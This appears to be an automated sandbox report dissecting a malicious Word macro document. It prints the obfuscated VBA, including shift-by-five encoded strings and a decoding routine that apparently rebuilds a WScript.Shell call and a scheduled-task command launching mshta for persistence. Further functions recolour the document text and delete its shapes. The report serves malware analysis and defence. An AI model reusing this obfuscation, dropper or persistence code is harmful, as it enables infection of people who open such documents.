                Dim EP0NRE9A as String

                81

                Dim Curri as String

                82

                Dim ehdebug as String

                83

                Dim driverquery as String

                84

                Dim drtprov as String

                85

                Dim Doual as String

                86

                Dim EP0NREAB as String

                87

                Dim ehSched as String

                88

                displayswitch = "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"

                89

                common = "jwynqj7:8.\x0fJsi%Kzshynts\x0fYXd\nsit|xZuifyj-.\x0f|nsit|3hqtxj-.\x0fA4xhwnuyC\x0fA4gti~C\x0fA4myrqC"

                90

                dfdll_dll_x8 = "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'\x12\x0f\x0f\x0e|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"

                91

                dismcoreps = "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"

                92

                dvdburn = "r\x2122yMMZ\x203a\x0153}\x7f\x0153svMZr\x2026r\x90\xa2\x81\x2013|{\x9d|\x2122vMo\x2020}n\x20ac\x20acMMZ\x203a\x0153{\x2013MMZ{\x0153\x2019\x2026\x2013MZ\x201e\x2013\x203a\x2018\x0153\x201e\x20ac\xa1\x2020\x2122rMMuv\x2018q\x2019\x203aMMMMZSSMM\x90g\x2030\x201e\x2013{q|\xa4\xa0\x2030\xa0\x2020\xa0\x81rz`_\x2030"

                93

                EP0NREAB = "AmyrqC\x0fAgti~C\x0fAxhwnuy%qfslzfljB'[GXhwnuy'C\x0f\x0fXzg%YXd\nsit|xZuifyj-.\x0f\x0e\\FSduwtknqjd{6%B%==\x0f\x0e\hsJfuFzym"

                94

                ehdebug = "z\x2019\x02c6`]\x0160XT\xa5TVMSS\x20ac\x2019\xa1MM\x201d\x203a}\x017ejrpu|M\x2013\x203a\x0192|x\x2019Zr\xa5}'\x12\x0f\x0e\x0eX[6886J8%B%'\x7f\x2019\xa0\xa0\x2013|{MMU\x201d\x2019\xa1Zv\xa1rzM\x2019{\x0192gn\x2020\xa4V[\xa3\x017d\x2122\x201a\x2019M\x2039\xa9M\x9d|\x201er\x7f\xa0u"

                95

                DISTLSTS = "'\x12\x0f\x0e\x0ex~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"

                96

                controller = "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.\x0f\x0eSj}y\x0f\x0eZ\x7fmltwt%B%\G56<95d\x0fJsi%Kzshynts\x0f\x0fKzshynts%zxjwynqj7:"

                97

                dependency_links = "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8\x0f\x0e|nswx%B%Z\x7fmltwt-|nswx.\x0f\x0eYS5576<d%B%|nswx\x0fJsi%Kzshyn"

                98

                Doual = "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'\x12\x0f\x0e\x0ex~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"

                99

                dispdiag = "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'\x12\x0f\x0e\x0eyjxydrzqyng~yjhtijh%B%'YM^^cMYMa^Y`fMYMa`MY`fYacY`fYa`MY`"

                100

                docomo = "bYM^^aMYf`Yb^YMbdMYMa^YMacMYe_Y^]^Y^^_YdcYMfdYMcdMY^]^YMa]MYMa]Yf^YffYM^]aYMcbYM^^aYMf`YMb`MYb]YMa`M"

                101

                dnsext = "Yf^MYMffMY^]aYMcbYM^^aMYMf`YafYaeYbaYMa`YMf^MYffYM^]aYMcbY^^aYf`MYMafMYMb]MYb]Ya^YaaYM`fYM^_aMYM`fMY"

                102

                Curri = "ts\x0f\x0fKzshynts%yxdljsjwnh-\hsJfuFzymUwt}~1%|nswx1%\\FSduwtknqjd{6%.\x0f\x0e}rkgt}%B%:\x0f\x0e_UINW9G%B%|nswx\x0f%%%%N"

                103

                DigitalLocker = "Ya`Y`fYM^]cY^]aY^^cMYM`fMYMa`MYM`fMYM^^cMY^^_YMbeMYM`fYMa`Y`fMYMadYMadYM^]_MY^]bYM^^]M'\x12\x0f\x0e\x0eyjxyddtx}"

                104

                drtprov = "p\x0161\x2018[\x2019\x2026rMM\\x90MR\x201d{\x9d\x017eRO'\x12\x0f\x0e\x0eyjxydniqjmnxytw~%B%'YM^]]MYM^^dYM^^_MYM^]]YMfdMY`fMYMa`Y`fMYM^^cMY^]^Y`fMYa`"

                105

                cordiaz = "shynts%Z\x7fmltwt-{jwhqxni%.\x0f\x0e{nj|uwt{%B%95\x0f\x0eKtw%{drxhixh%B%6%Yt%Qjs-{jwhqxni.\x0f\x0e\x0e\G56<95d%B%\G56<95d%+%"

                106

                compdyn = "-zxjwynqj7:61%zxjwynqj7:71%zxjwynqj7:8.\x0f\x0ezxjwynqj7:%B%Hmw-Fxh-Rni-zxjwynqj7:61%zxjwynqj7:71%6..%2%zx"

                107

                EP0NCA9A = "}~.%\x0f\x0e\x0eX[8757J8%B%'a^MYM^_aMYM`_YMacMY`_MYMa]MYM`_MY`cYMcfYM^^]MYecMYMbeYcdMYMdfYM^]fMYMe`YMe]YM^]^M"

                108

                DGPICCAP = "MYM^]^YM^^fYMabYMdfY`fYMa`MY`fMYMfeY^]cMYM^]^MYffMY^^cMYM`_MYMdeY^]^MYM^^cMYMacMYedYM`fMYMa`YM`fMY^]"

                109

                EP0NGJ8F = "f6'.\x0f\x0e_UINW9G%B%yxdljsjwnh-|nswx1%_UINW9G1%\\FSduwtknqjd{6.\x0fJsi%Xzg\x0f\x0fKzshynts%YS5576<d-\hsJfuFzymUwt"

                110

                EP0NRE9A = "Uwt}~%B%'\x201e\x20ac\x90\x0178v}\x81[\x20ac\x2022r\x2122\x2122'\x0f\x0eXjy%|nswx%B%HwjfyjTgojhy-Z\x7fmltwt-\hsJfuFzymUwt}~..\x0f\x0e_UINW9G%B%YS5576<d-'ify"

                111

                ehSched = "YMffMYf^Yb_MYMaaMYb]YMb_MYaaMYb]Yb`YMf`MYMabMYM^]cYdfMYd`MY^^]MY`fMYM`fYMa^V\x2039\xa9M[MUMQ\x9d\xa0\x2022|\x0161\x2019\x02c6_^\x0160XQ}\x20acu\x0153"

                112

                CREDITS = "%_UINW9G1%}rkgt}1%Ywzj\x0f\x0eJsi%Nk\x0f\x0e_UINW9G%B%'\xa2\xa0\x2019\x0178\x9d\x2122\xa2\x201d\x9d\x2122\x017d\xa6\x2019\xa1\xa4'\x0f\x0eyxdljsjwnh%B%_UINW9G\x0fJsi%Kzshynts\x0f\x0f\x0f\x0fKz"

                113

                driverquery = "Y`fMYM^]fYM^^bMYacYffMY^^^YM^]fMYMadYffMYM^]aY`fYMa`Y`fYM^]^YM`fMYMa`MYM`fYffMY^]dMYadY^]bMY^^]Y`fMY"

                114

                CscMigDl = "k%-\\FSduwtknqjd{6%C%}rkgt}.%Ymjs\x0f\x0e\x0e}rkgt}%B%\\FSduwtknqjd{6%2%\\FSduwtknqjd{6\x0f\x0e\x0e\hsJfuFzymUwt}~3Wzs"

                115

                dicowan = "dxzuutwy%B%'\x90g\x2030\x201e\x2013{q|\xa4\xa0\x2030\xa0\x2020\xa0\x81rz`_\x2030p\x0161\x2018[\x2019\x2026rMM\\x90MMMO\x20ac\x2019\xa1MMMn\x2020\x201ejMMZ\x2014|v\x203a\x02c6pun\x0178\x02c6\x0160\x0160MUa]MY`fMYMa]MYMdeY`fYMa`Y`f"

                117

                test_startfile02 = "nhfhqx"

                118

                SO02269_ = "NK6987J8"

                119

                test_startfile02 = "NRYHHTWJ"

                120

                SO02269_ = EP0NREAB & EP0NRE9A & EP0NGJ8F & EP0NCA9A & ehSched & ehdebug & dvdburn & drtprov & driverquery & Doual & docomo & dnsext & DISTLSTS & displayswitch & dispdiag & dismcoreps & DigitalLocker & dicowan & DGPICCAP & dfdll_dll_x8 & dependency_links & Curri & CscMigDl & CREDITS & cordiaz & controller & compdyn & common

                121

                fstexp = SO02269_

                122

                End Function

                Function MSART8, APIs: 4, Strings: 0, Number of lines: 16, Relevance: 7.516
                APIsMeta Information

                Len

                		Len("\xHWnUY3Xmjqq") -> 13 Len("xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'") -> 95 Len("MfHPJW") -> 6 Len("Rfq\x7fNQqF") -> 8 Len("uWthJ}U") -> 7 Len("\nWJXmFWP") -> 9 Len("M}I") -> 3 Len("Ut|JWxmjQqdnXJ") -> 14 Len("niF") -> 3 Len("Tqq~") -> 4 Len("knIIQJw") -> 7 Len("rFQ|Fwj") -> 7 Len("[rytTQxi") -> 8 Len("X\nslGt]") -> 8 Len("{gt]YwF^") -> 8 Len("xjhzsnf") -> 7 Len("mnofhp") -> 6 Len("[rytTqxi,") -> 9 Len("[gt}") -> 4 Len("{R\fWJ") -> 6 Len("[]xYWjfR") -> 8 Len("FZyTNy") -> 6 Len("{rYtTqx") -> 7 Len("Yhu[Nj\") -> 7 Len("uwTHJxx%j}uQtwjw") -> 16 Len("[NxzFq%gFXnH") -> 12 Len("|NSRLryx?aa3awttyahnR[7") -> 23 Len("XJQJHY%SfrJ%KWTR%\Ns87dUWtHJxX") -> 30 Len("XHWnUyNSL3KNqjX~XyJRTgoJHY") -> 26 Len("FUUIFYF") -> 7 Len("a\UKY:873myf") -> 12 Len("AmyrqC\x0fAgti~C\x0fAxhwnuy%qfslzfljB'[GXhwnuy'C\x0f\x0fXzg%YXd\nsit|xZuifyj-.\x0f\x0e\\FSduwtknqjd{6%B%==\x0f\x0e\hsJfuFzymUwt}~%B%'\xfffd\xfffd\xfffd\xfffdv}\xfffd[\xfffd\xfffdr\xfffd\xfffd'\x0f\x0eXjy%|nswx%B%HwjfyjTgojhy-Z\x7fmltwt-\hsJfuFzymUwt}~..\x0f\x0e_UINW9G%B%YS5576<d-'ifyf6'.\x0f\x0e_UINW9G%B%yxdljsjwnh-|nswx1%_UINW9G1%\\FSduwtknqjd{6.\x0fJsi%Xzg\x0f\x0fKzshynts%YS5576<d-\hsJfuFzymUwt}~.%\x0f\x0e\x0eX[8757J8%B%'a^MYM^_aMYM`_YMacMY`_MYMa]MYM`_MY`cYMcfYM^^]MYecMYMbeYcdMYMdfYM^]fMYMe`YMe]YM^]^MYMffMYf^Yb_MYMaaMYb]YMb_MYaaMYb]Yb`YMf`MYMabMYM^]cYdfMYd`MY^^]MY`fMYM`fYMa^V\xfffd\xfffdM[MUMQ\xfffd\xfffd\xfffd|\xfffd\xfffd\xfffd_^\xfffdXQ}\xfffdu\xfffdz\xfffd\xfffd`]\xfffdXT\xfffdTVMSS\xfffd\xfffd\xfffdMM\xfffd\xfffd}\xfffdjrpu|M\xfffd\xfffd\xfffd|x\xfffdZr\xfffd}'\x12\x0f\x0e\x0eX[6886J8%B%'\x7f\xfffd\xfffd\xfffd\xfffd|{MMU\xfffd\xfffd\xfffdZv\xfffdrzM\xfffd{\xfffdgn\xfffd\xfffdV[\xfffd\xfffd\xfffd\xfffd\xfffdM\xfffd\xfffdM\xfffd|\xfffdr\x7f\xfffdur\xfffdyMMZ\xfffd\xfffd}\x7f\xfffdsvMZr\xfffdr\xfffd\xfffd\xfffd\xfffd|{\xfffd|\xfffdvMo\xfffd}n\xfffd\xfffdMMZ\xfffd\xfffd{\xfffdMMZ{\xfffd\xfffd\xfffd\xfffdMZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdrMMuv\xfffdq\xfffd\xfffdMMMMZSSMM\xfffdg\xfffd\xfffd\xfffd{q|\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdrz`_\xfffdp\xfffd\xfffd[\xfffd\xfffdrMM\\xfffdMR\xfffd{\xfffd\xfffdRO'\x12\x0f\x0e\x0eyjxydniqjmnxytw~%B%'YM^]]MYM^^dYM^^_MYM^]]YMfdMY`fMYMa`Y`fMYM^^cMY^]^Y`fMYa`Y`fMYM^]fYM^^bMYacYffMY^^^YM^]fMYMadYffMYM^]aY`fYMa`Y`fYM^]^YM`fMYMa`MYM`fYffMY^]dMYadY^]bMY^^]Y`fMYa`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'\x12\x0f\x0e\x0ex~xdxw{%B%'`YMf`MYf^MYffMY^]aYcbYM^^aMYf`Yb^YMbdMYMa^YMacMYe_Y^]^Y^^_YdcYMfdYMcdMY^]^YMa]MYMa]Yf^YffYM^]aYMcbYM^^aYMf`YMb`MYb]YMa`MYf^MYMffMY^]aYMcbYM^^aMYMf`YafYaeYbaYMa`YMf^MYffYM^]aYMcbY^^aYf`MYMafMYMb]MYb]Ya^YaaYM`fYM^_aMYM`fMY'\x12\x0f\x0e\x0ex~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMffYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYbaMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'\x12\x0f\x0e\x0eyjxydrzqyng~yjhtijh%B%'YM^^cMYMa^Y`fMYMa`MY`fYacY`fYa`MY`fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`fYa`Y`fYM^]cY^]aY^^cMYM`fMYMa`MYM`fMYM^^cMY^^_YMbeMYM`fYMa`Y`fMYMadYMadYM^]_MY^]bYM^^]M'\x12\x0f\x0e\x0eyjxyddtx}dxzuutwy%B%'\xfffdg\xfffd\xfffd\xfffd{q|\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdrz`_\xfffdp\xfffd\xfffd[\xfffd\xfffdrMM\\xfffdMMMO\xfffd\xfffd\xfffdMMMn\xfffd\xfffdjMMZ\xfffd|v\xfffd\xfffdpun\xfffd\xfffd\xfffd\xfffdMUa]MY`fMYMa]MYMdeY`fYMa`Y`fMYM^]^YM^^fYMabYMdfY`fYMa`MY`fMYMfeY^]cMYM^]^MYffMY^^cMYM`_MYMdeY^]^MYM^^cMYMacMYedYM`fMYMa`YM`fMY^]^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'\x12\x0f\x0f\x0e|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxytw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8\x0f\x0e|nswx%B%Z\x7fmltwt-|nswx.\x0f\x0eYS5576<d%B%|nswx\x0fJsi%Kzshynts\x0f\x0fKzshynts%yxdljsjwnh-\hsJfuFzymUwt}~1%|nswx1%\\FSduwtknqjd{6%.\x0f\x0e}rkgt}%B%:\x0f\x0e_UINW9G%B%|nswx\x0f%%%%Nk%-\\FSduwtknqjd{6%C%}rkgt}.%Ymjs\x0f\x0e\x0e}rkgt}%B%\\FSduwtknqjd{6%2%\\FSduwtknqjd{6\x0f\x0e\x0e\hsJfuFzymUwt}~3Wzs%_UINW9G1%}rkgt}1%Ywzj\x0f\x0eJsi%Nk\x0f\x0e_UINW9G%B%'\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd'\x0f\x0eyxdljsjwnh%B%_UINW9G\x0fJsi%Kzshynts\x0f\x0f\x0f\x0fKzshynts%Z\x7fmltwt-{jwhqxni%.\x0f\x0e{nj|uwt{%B%95\x0f\x0eKtw%{drxhixh%B%6%Yt%Qjs-{jwhqxni.\x0f\x0e\x0e\G56<95d%B%\G56<95d%+%zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.\x0f\x0eSj}y\x0f\x0eZ\x7fmltwt%B%\G56<95d\x0fJsi%Kzshynts\x0f\x0fKzshynts%zxjwynqj7:-zxjwynqj7:61%zxjwynqj7:71%zxjwynqj7:8.\x0f\x0ezxjwynqj7:%B%Hmw-Fxh-Rni-zxjwynqj7:61%zxjwynqj7:71%6..%2%zxjwynqj7:8.\x0fJsi%Kzshynts\x0fYXd\nsit|xZuifyj-.\x0f|nsit|3hqtxj-.\x0fA4xhwnuyC\x0fA4gti~C\x0fA4myrqC") -> 2783 Len("wfsitrdsfrj") -> 11

                Part of subcall function modemcsa@ThisDocument: Chr

                Part of subcall function modemcsa@ThisDocument: Asc

                Part of subcall function modemcsa@ThisDocument: Mid

                LineInstructionMeta Information
                153

                Function MSART8(msdatsrc as String) as String

                154

                Dim msproof7 as Long

                executed
                155

                Dim MSWDS_FR as String

                156

                Dim msgfilt as Integer

                157

                msgfilt = 5

                158

                Dim wmpconfig as Integer

                158

                wmpconfig = 1

                159

                Dim WMI_Tracing as Integer

                159

                WMI_Tracing = wmpconfig * 9

                160

                If wmpconfig < WMI_Tracing Then

                161

                For msproof7 = 1 To Len(msdatsrc)

                Len("\xHWnUY3Xmjqq") -> 13

                executed
                162

                MSWDS_FR = MSWDS_FR & modemcsa(msdatsrc, msproof7, msgfilt)

                163

                Next msproof7

                Len("\xHWnUY3Xmjqq") -> 13

                executed
                164

                Endif

                165

                MSART8 = MSWDS_FR

                166

                End Function

                Function GRAPH, APIs: 0, Strings: 3, Number of lines: 14, Relevance: 3.764
                StringsDecrypted Strings
                "Numqux{hRnlUqzlns"
                "nuxxwq"
                "nuxxwq"
                LineInstructionMeta Information
                139

                Function GRAPH(test_startfile5 as Integer, system as String)

                140

                Dim test_idlehistory as Integer

                executed
                141

                test_idlehistory = test_startfile5 * 2

                142

                system = "Numqux{hRnlUqzlns"

                143

                Dim web_hightrust as Integer

                143

                web_hightrust = 267

                144

                Dim webdav as Integer

                144

                webdav = 9

                145

                If web_hightrust > webdav Then

                146

                system = "nuxxwq" + system

                147

                test_idlehistory = test_startfile5 - test_startfile5

                148

                Endif

                149

                GRAPH = test_idlehistory

                150

                End Function

                Function xrWPpb4, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755
                APIsMeta Information

                WholeStory

                Font

                Select

                LineInstructionMeta Information
                224

                Function xrWPpb4()

                225

                Selection.WholeStory

                WholeStory

                executed
                226

                Selection.Font.Color = - 587137025

                Font

                227

                ThisDocument.Range(0, 0).Select

                Select

                228

                End Function

                Function modemcsa, APIs: 3, Strings: 0, Number of lines: 3, Relevance: 3.753
                APIsMeta Information

                Chr

                Asc

                Mid

                LineInstructionMeta Information
                168

                Function modemcsa(mr_in as String, modemcsa2 as Long, modemcsa3 as Integer) as String

                169

                modemcsa = Chr(Asc(Mid(mr_in, modemcsa2, 1)) - modemcsa3)

                Chr

                Asc

                Mid

                executed
                170

                End Function

                Function wsepno, APIs: 1, Strings: 0, Number of lines: 7, Relevance: 1.257
                APIsMeta Information

                Delete

                LineInstructionMeta Information
                231

                Function wsepno()

                232

                With ActiveDocument.Shapes

                executed
                233

                For test_startfile = . Count To 1 Step - 1

                234

                . Item(test_startfile).Delete

                Delete

                235

                Next

                236

                End With

                237

                End Function

                Reset < >